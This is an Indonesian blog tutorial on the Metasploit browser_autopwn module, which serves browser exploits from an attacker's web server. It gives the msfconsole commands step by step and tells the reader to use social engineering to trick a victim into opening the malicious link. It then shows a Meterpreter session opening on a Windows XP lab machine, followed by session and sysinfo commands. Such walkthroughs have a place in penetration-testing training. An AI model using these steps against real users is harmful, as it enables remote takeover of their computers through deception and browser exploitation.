Metasploit Browser Autopwn

Pada saat ini karena ada pembatasan dari firewall dan kebijakan manajemen patch untuk  mengeksploitasi suatu sistem jauh lebih sulit. Namun salah satu cara yang paling efisien adalah menyerang dari sisi Client. Sisi client memerlukan interaksi pengguna dan dalam sebagian besar kasus dapat digunakan melalui keterlibatan rekayasa sosial (social engineering). Seorang pengguna yang tidak memiliki pengetahuan untuk memahami risiko keamanan komputer membuka link yang dipercayai dapat membantu penyerang untuk mengeksploitasi sistem internal. Fakta bahwa celah keamanan pada browser tidak ditambal sesering sistem operasi membuat masalah ini menjadi besar.

Pada artikel ini kita akan membahas module dari metasploit Browser Autopwn . Ide dasar dibalik modul itu adalah bahwa hal itu menciptakan sebuah web server di mesin lokal (Localhost) yang akan berisi berbagai jenis exploit pada browser. Ketika pengguna membuka link berbahaya maka pada sistem korban akan dikirimkan exploit Browser Autopwn yang terdiri dari berbagai macam exploit pada browser dan versinya tentunya, jika salah satu dari eksploit tadi yang telah dikirimkan berhasil  maka sesi meterpreter akan terbuka .

Sebelumnya kita harus menginstall Metasploit Framework terlebih dahulu dan adanya module Browser_Autopwn di Metasploit Framework

Penyerang : 172.16.43.133 (Kali Linux/Backtrack) Metasploit Framework dengan Module Browser_Autopwn
Korban      : 172.16.43.140 (Windows)

Tahap-tahap penyerangan

1. Buka Terminal pada Sistem Operasi Kali Linux/Backtrack
2. Ketikan msfconcole pada terminal
3. Menggunakan module Browser Autopwn, use auxiliary/server/browser_autopwn

4. Melihat opsi yang ada show options 
5. Tentukan IP Penyerang,
set LHOST 172.16.43.133
6. Tentukan Port yang akan diakses korban untuk mengeksekusi exploit pada Penyerang,
set SRVPORT 80
7. Tentukan URIPATH pada saat korban mengakses exploit pada Penyerang, set URIPATH /
8. Lalu jalankan exploitnya, run

Pada saat terjadi

[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://172.16.43.133:80/
[*] Server started.


Kita dapat melakukan teknik rekayasa sosial untuk mengelabui Korban untuk mengeksekusi link 172.16.43.133 pada browser target



Pada saat korban mengakses link 172.16.43.133 pada browser target maka pada akan terjadi

[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (172.16.43.133:62360 -> 172.16.43.140:1798)

Port koneksi pada Penyerang maupun pada Korban tidak selalu sama, maka kita telah dapat masuk dalam sistem target. Cukup dengan tekan enter pada keyboard

9. Untuk melihat koneksi apa saja yang terjadi kita,

sessions -l
 
Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 172.16.43.133:62360 -> 172.16.43.140:1798 


10. Lalu untuk memasuki meterpreter yang ada pada Korban,

sessions -i 1
 
*] Starting interaction with 1... 

1 adalah Id pada description Meterpreter yang telah kita buat sebelumnya
 

11. Pada tahap ini kita sudah masuk dalam sistem target dengan memasuki melalui meterpreter
Untuk mengetahui informasi mengenai komputer korban adalah, sysinfo
 
Computer: XP-SP2-BARE
OS : Windows XP (Build 2600, Service Pack 2).  
 
 
Sumber : 
http://cybershakti.my3gb.com/Browser_Autopwn.htm
http://pentestlab.wordpress.com/2012/04/23/metasploit-browser-autopwn/

Iklan

Tinggalkan Balasan

Please log in using one of these methods to post your comment:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s